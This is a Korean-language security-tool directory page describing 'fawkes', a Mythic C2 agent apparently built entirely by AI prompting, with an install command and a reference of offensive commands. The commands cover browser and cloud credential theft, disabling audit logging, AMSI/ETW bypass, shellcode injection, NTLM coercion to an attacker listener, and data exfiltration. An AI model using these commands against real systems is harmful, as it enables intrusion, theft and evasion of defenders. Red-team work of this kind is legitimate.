Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
fawkes — Fawkes는 AI에 의해 독점적으로 작성된 golang Mythic C2 에이전트입니다. | Kitploit
도구/GitHubGitHub/galoryber/fawkes
Defensive ToolsPenetration Testing FrameworksPrivilege EscalationExploit FrameworksLateral MovementPost-ExploitationCloud SecurityCommand and ControlPayload DevelopmentContainer Escape
GitHub
356272개월 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
galoryber/fawkes

fawkes

Fawkes는 AI에 의해 독점적으로 작성된 golang Mythic C2 에이전트입니다.

저장소 보기

Fawkes Mythic C2 에이전트

Fawkes는 완전히 바이브 코딩된 Mythic C2 에이전트입니다. '궁금하네'에서 시작해 목표로 발전했습니다. 제 목표는 이 에이전트를 위해 단 한 줄의 코드도 작성하지 않고, 오직 프롬프트로만 생성하는 것입니다.

원래 직접 에이전트를 작성해보려 했지만, 예제 컨테이너를 클론하고, mythic 문서를 읽고, 개발 시리즈 유튜브 동영상을 보고, Merlin이나 Freyja 같은 다른 에이전트의 코드를 복사한 후, 제 에이전트를 개발할 시간이 없다고 결심했습니다. 하지만 프롬프트라면 시간을 낼 수 있습니다.

Fawkes는 크로스 플랫폼 기능을 갖춘 golang 기반 에이전트입니다. Windows(EXE, DLL 및 셸코드 페이로드), Linux(ELF 바이너리 및 공유 라이브러리), macOS (Intel 및 Apple Silicon용 Mach-O 바이너리)를 지원합니다. 총 213개 명령어: 113개 크로스 플랫폼, 82개 Windows 전용, 21개 Unix 전용, 11개 Linux 전용, 6개 macOS 전용(일부 명령어는 스크린샷과 같이 하나의 사용자용 이름으로 플랫폼별 구현을 공유합니다). 내부 피벗을 위한 HTTP 이그레스 및 TCP 피어-투-피어(P2P) 연결을 지원합니다.

Installation

To install Fawkes, you'll need Mythic installed on a remote computer. You can find installation instructions for Mythic at the Mythic project page.

From the Mythic install directory:``` ./mythic-cli install github https://github.com/galoryber/fawkes

## 명령어 빠른 참조Command | Syntax | Description
------- | ------ | -----------
acl-edit | `acl-edit -action read -server dc01 -target user` | Active Directory 개체 DACL 읽기/수정 (ACE 추가/제거, DCSync 권한 부여, GenericAll, 백업/복원). 크로스 플랫폼 (T1222.001, T1098, T1003.006).
adcs | `adcs -action <cas\|templates\|find\|request\|auto-exploit> -server <DC> -username <user@domain> -password <pass> [-ca_name <CA>] [-template <name>] [-alt_name <UPN>]` | AD 인증서 서비스 열거, 취약한 템플릿 찾기 (ESC1-ESC4, DCOM을 통한 ESC6), DCOM을 통해 인증서 요청하여 ESC1/ESC6 익스플로잇, 또는 자동 익스플로잇 (찾기 → 분석 → 요청 체인). 크로스 플랫폼 (T1649).
ads | `ads -action <write\|read\|list\|delete> -file <path> [-stream <name>] [-data <content>] [-hex true]` | **(Windows 전용)** NTFS 대체 데이터 스트림 관리 — 숨겨진 데이터 스트림 쓰기, 읽기, 나열 또는 삭제. 텍스트 및 16진수 인코딩된 바이너리 지원. MITRE T1564.004.
amcache | `amcache -action <query\|search\|delete\|clear> [-name <pattern>] [-count <n>]` | 포렌식 실행 아티팩트 조회 및 정리. Windows: Shimcache. Linux: recently-used.xbel, 썸네일, Tracker. macOS: 최근 항목, KnowledgeC, 격리 (T1070.004).
apc-injection | `apc-injection [-method <apc\|hwbp>] -pid <PID> [-tid <TID>] [-target_api ntdll!NtDelayExecution] [-timeout_ms 30000]` | **(Windows 전용)** 원격 프로세스 주입. `-method apc` (기본값)는 NtQueueApcThread를 통해 경고 가능한 스레드에 셸코드를 큐에 넣습니다 (`ts`를 사용하여 찾기). `-method hwbp`는 DebugActiveProcess를 통해 연결하고 대상 API(기본값 `ntdll!NtDelayExecution`)에 DR0 하드웨어 중단점을 설정하며, 중단점이 발생하면 Rip을 셸코드로 리디렉션합니다 — TID 불필요, APC 큐 없음, CreateRemoteThread 없음 (T1055.004, T1055).
audio-capture | `audio-capture [-duration 10] [-sample_rate 16000] [-channels 1] [-device default]` | 마이크에서 오디오를 녹음하고 WAV 파일 업로드. Windows (waveIn), Linux (arecord/parecord), macOS (rec/ffmpeg). 크로스 플랫폼 (T1123).
auditpol | `auditpol -action <query\|disable\|enable\|stealth> [-category <name\|all>]` | **(Windows 전용)** Windows 감사 정책 조회 및 수정. 민감한 작업 전에 보안 이벤트 로깅 비활성화. Stealth 모드는 탐지에 중요한 하위 범주를 비활성화합니다. AuditQuerySystemPolicy API 사용 (T1562.002).
argue | `argue -command "cmd.exe /c whoami" -spoof "cmd.exe /c echo hello"` | **(Windows 전용)** 스푸핑된 프로세스 인수로 명령 실행. Sysmon 이벤트 ID 1 및 EDR 명령줄 원격 측정 우회 (T1564.010).
arp | `arp [-ip <subnet>]` 또는 `arp -action spoof -target <IP> -gateway <IP>` | ARP 테이블 표시 (필터링 가능) 또는 MITM 위치 선정을 위한 ARP 캐시 중독 (T1557.002). Spoof: Linux 전용, 정리 시 복원.
asrep-roast | `asrep-roast -server <DC> -username <user@domain> -password <pass> [-account <target>]` | 사전 인증이 필요 없는 계정에 대해 AS-REP 티켓을 요청하고 오프라인 크래킹을 위해 hashcat 형식으로 해시 추출. LDAP을 통해 자동 열거. 크로스 플랫폼 (T1558.004).
av-detect | `av-detect [-deep true]` | 실행 중인 프로세스를 130개 이상의 시그니처 데이터베이스와 비교하여 설치된 AV/EDR/보안 제품 탐지. `--deep` 사용 시 커널 모듈, systemd 유닛 및 구성 디렉토리도 검사하여 설치되었지만 실행 중이 아닌 제품 확인 (Linux). 제품, 공급업체, 유형 및 PID 보고. 크로스 플랫폼.
autopatch | `autopatch <dll_name> <function_name> <num_bytes>` | **(Windows 전용)** 가장 가까운 반환(C3) 명령어로 점프하여 함수를 자동으로 패치. AMSI/ETW 우회에 유용.
base64 | `base64 -action <encode\|decode\|xor\|hex\|hex-decode\|rot13\|url\|url-decode\|caesar> -input <data> [-key <key>] [-shift <N>] [-file true] [-output <path>]` | 데이터 인코딩 도구 키트: base64, XOR (문자열/16진수 키 사용), 16진수, ROT13, URL 퍼센트 인코딩, Caesar 암호. 모두 파일 I/O 지원. 크로스 플랫폼 (T1132.001, T1140, T1027).
bits | `bits -action <list\|create\|persist\|cancel\|suspend\|resume\|complete> [-name <job>] [-url <URL>] [-path <local>] [-command <exe>]` | **(Windows 전용)** BITS 전송 작업을 관리하여 지속성 및 은밀한 파일 다운로드. 작업 생성, 일시 중단, 재개, 완료 및 알림 명령 설정하여 지속성 유지. 작업은 재부팅 후에도 유지됨 (T1197).
browser | `browser [-action <passwords\|cookies\|history\|autofill\|bookmarks\|downloads>] [-browser <all\|chrome\|edge\|chromium\|firefox>]` | Chromium, Firefox 및 Safari에서 브라우저 데이터 수집. 기록, 자동 채우기, 북마크, 다운로드는 크로스 플랫폼. 비밀번호: Chromium (DPAPI/Keychain/GNOME Keyring), Firefox (key4.db NSS 복호화), Safari (macOS 키체인). Firefox 쿠키는 모든 플랫폼. MITRE T1555.003, T1217.
cat | `cat <file>` 또는 `cat -path <file> -start N -end N -number true` | 선택적 줄 범위, 번호 매기기 및 5MB 크기 보호와 함께 파일 내용 표시.
cd | `cd <directory>` | 현재 작업 디렉토리 변경.
chmod | `chmod -path <file> -mode <permissions> [-recursive true]` | 파일/디렉토리 권한을 8진수(755, 644) 또는 기호(+x, u+rw, go-w) 표기법으로 수정. 재귀 지원. 크로스 플랫폼 (T1222).
chown | `chown -path <file> -owner <user> [-group <group>] [-recursive true]` | **(Linux/macOS 전용)** 사용자 이름/UID 및 그룹 이름/GID로 파일/디렉토리 소유권 변경. 재귀 지원 (T1222).
cert-check | `cert-check -host <hostname> [-port 443] [-timeout 10]` | 원격 호스트의 TLS 인증서 검사 — CA, 자체 서명 인증서, 만료, SAN, TLS 버전, 암호 제품군 및 SHA256 지문 식별. 크로스 플랫폼 (T1590.001).
certstore | `certstore -action <list\|find> [-store <MY\|ROOT\|CA\|Trust\|TrustedPeople>] [-filter <substring>]` | **(Windows 전용)** Windows 인증서 저장소를 열거하여 코드 서명 인증서, 클라이언트 인증 인증서 및 개인 키 찾기. CurrentUser 및 LocalMachine 검색. MITRE T1552.004, T1649.
clipboard | `clipboard -action <read\|write\|monitor\|dump\|stop> [-data "text"] [-interval 3]` | 클립보드 읽기/쓰기 또는 자격 증명 패턴 탐지로 변경 사항을 지속적으로 모니터링. 크로스 플랫폼 (T1115).
cloud-metadata | `cloud-metadata -action <detect\|creds\|storage\|aws-iam\|azure-graph\|gcp-iam\|aws-s3\|azure-blob\|gcp-gcs\|aws-persist\|azure-persist\|aws-ssm\|azure-keyvault\|gcp-secrets\|...> [-provider <auto\|aws\|azure\|gcp\|do>]` | 클라우드 메타데이터, 자격 증명 추출, IAM 열거, 스토리지 열거, 지속성 및 비밀 저장소 액세스. storage/aws-s3/azure-blob/gcp-gcs: 버킷/컨테이너 열거 (샘플 개체 포함). aws-ssm: 복호화와 함께 SSM 파라미터 저장소. azure-keyvault: 관리 ID를 통한 Key Vault 비밀. gcp-secrets: 서비스 계정을 통한 Secret Manager. aws-persist/azure-persist: 수명이 긴 액세스 키/앱 등록 생성. 자동 탐지. IMDSv2. 크로스 플랫폼 (T1552.005, T1580, T1530, T1098.001).
compress | `compress -action <create\|list\|extract\|stage\|exfil\|stage-exfil\|exfil-https\|exfil-github> -path <path> [-format zip\|tar.gz] [-output <out>] [-pattern *.txt] [-cleanup true]` | 아카이브 생성, 나열, 추출, 스테이징 또는 유출. stage: AES-256-GCM으로 암호화. exfil: Mythic으로 전송. exfil-https: 사전 서명된 URL로 S3/Azure/GCS에 청크 업로드, 사용자 정의 헤더, 지터 포함. exfil-github: GitHub Contents API를 통해 유출. 크로스 플랫폼 (T1560.001, T1074.001, T1041, T1048, T1567, T1567.001).
coerce | `coerce -server <target> -listener <attacker-ip> [-method petitpotam\|printerbug\|shadowcoerce\|all] -username <user> [-password <pass>] [-hash <NT hash>] [-domain <domain>]` | MS-EFSR (PetitPotam), MS-RPRN (PrinterBug), MS-FSRVP (ShadowCoerce)를 통한 NTLM 인증 강제. 대상이 공격자 수신기에 인증하도록 강제. 패스더해시 지원. 크로스 플랫폼 (T1187).
config | `config [-action show\|set\|update] [-key sleep\|jitter\|killdate\|working_hours_start\|working_hours_end\|working_days] [-value <val>] [-file <binary>] [-hash <sha256>]` | 런타임 에이전트 구성 보기/수정 또는 에이전트 바이너리 자체 업데이트. `show`/`set`: sleep, jitter, 종료 날짜, 근무 시간. `update`: Mythic에서 새 페이로드 다운로드, 확인, 실행 및 현재 에이전트 종료. 크로스 플랫폼 (T1105).
container-detect | `container-detect` | 컨테이너 런타임 및 환경 탐지 (Docker, K8s, LXC, Podman, WSL). Docker 소켓 및 K8s 서비스 계정과 같은 탈출 벡터 확인. 크로스 플랫폼 (T1082, T1497.001).
도구 다운로드